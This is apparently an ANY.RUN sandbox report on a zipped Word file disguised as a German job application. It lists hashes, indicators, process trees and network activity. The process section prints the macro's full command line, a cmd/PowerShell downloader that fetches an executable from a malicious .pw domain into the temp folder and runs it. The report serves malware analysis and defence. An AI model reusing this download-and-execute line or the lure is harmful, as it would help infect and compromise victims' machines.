analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Sofia Kohl - Bewerbung.do_.zip

Full analysis: https://app.any.run/tasks/68dec289-2327-4b54-befb-d2cfab5f4ff0
Verdict: Malicious activity
Analysis date: January 11, 2019, 10:26:34
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

9B03A6CB6468BDC4604770F0D8A4B9DC

SHA1:

9963FE1E1AF8CC3D6696F529CE44D41CE24FDC93

SHA256:

B43B220DBA62C1DE06507F21F9282F7B729CA4F0AAC621B8762701E8944B4218

SSDEEP:

1536:v+TSJ/HVpPfzYgWgXKDAXYUTd8873IQmshLPz3EyIaJIgDTZqmB9+t+5Knualy:v+2J/HV536sbTd887YzoDELmDF+w5aly

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3892)

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3892)

    • Executes PowerShell scripts

      • cmd.exe (PID: 2852)

  • SUSPICIOUS

    • Reads Internet Cache Settings

      • WINWORD.EXE (PID: 3892)

    • Creates files in the user directory

      • powershell.exe (PID: 1512)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3892)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3892)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipFileName: Sofia_Kohl_-_Bewerbung.doc
ZipUncompressedSize: 74517
ZipCompressedSize: 68385
ZipCRC: 0xe86a053e
ZipModifyDate: 2018:12:07 18:10:18
ZipCompression: Deflated
ZipBitFlag: 0x0001
ZipRequiredVersion: 788
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
5
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs winword.exe cmd.exe no specs powershell.exe no specs cmd.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2964"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Sofia Kohl - Bewerbung.do_.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
3892"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2852cmd /c powErshEll(New-Object System.Net.WebClient).DownloadFile('http://tokotikotoko.pw/kiki.exe','%temp%\xkbkagcm.exe');start %temp%\xkbkagcm.exeC:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1512powErshEll (New-Object System.Net.WebClient).DownloadFile('http://tokotikotoko.pw/kiki.exe','C:\Users\admin\AppData\Local\Temp\xkbkagcm.exe');start C:\Users\admin\AppData\Local\Temp\xkbkagcm.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1472"C:\Windows\system32\cmd.exe" C:\Windows\system32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
16 359
Read events
8 371
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
4
Text files
3
Unknown types
4

Dropped files

PID
Process
Filename
Type
3892WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRBB90.tmp.cvr
MD5:
SHA256:
3892WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\query[1].asmx
MD5:
SHA256:
3892WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2437BDDE.png
MD5:
SHA256:
3892WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9E0EAAA0-6323-41F3-A209-0A0894A36F77}.tmp
MD5:
SHA256:
3892WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\97291847.png
MD5:
SHA256:
1512powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LW6TQBEGTDJW17EXRAM1.temp
MD5:
SHA256:
1512powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF269273.TMPbinary
MD5:6073B6FC66D2E68644893344F6904E4A
SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
1512powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:6073B6FC66D2E68644893344F6904E4A
SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
2964WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRb2964.42145\Sofia_Kohl_-_Bewerbung.docdocument
MD5:ABD244239B80F1EB97E9700AB80431CA
SHA256:1F9D54A08BD8A407F7215D5246008189E9FD9DA061B89DF09A32079E6D4526E2
3892WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:658F4CE7F2FDAA42551116B2AE926220
SHA256:07A1E1E6534E4B466BB88B0B44E33E5B143ECDAD52A32414F7F85D7A96073E52
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
2
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3892
WINWORD.EXE
GET
200
52.109.76.6:80
http://office14client.microsoft.com/config14?UILCID=1033&CLCID=1033&ILCID=1033&HelpLCID=1033&App={019C826E-445A-4649-A5B0-0BF08FCC4EEE}&build=14.0.6023
IE
xml
1.99 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3892
WINWORD.EXE
52.109.76.6:80
office14client.microsoft.com
Microsoft Corporation
IE
whitelisted
3892
WINWORD.EXE
52.109.120.29:443
rr.office.microsoft.com
Microsoft Corporation
HK
whitelisted

DNS requests

Domain
IP
Reputation
office14client.microsoft.com
  • 52.109.76.6
whitelisted
rr.office.microsoft.com
  • 52.109.120.29
whitelisted
tokotikotoko.pw
malicious

Threats

PID
Process
Class
Message
Potentially Bad Traffic
ET DNS Query to a *.pw domain - Likely Hostile
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Sofia Kohl - Bewerbung.do_.zip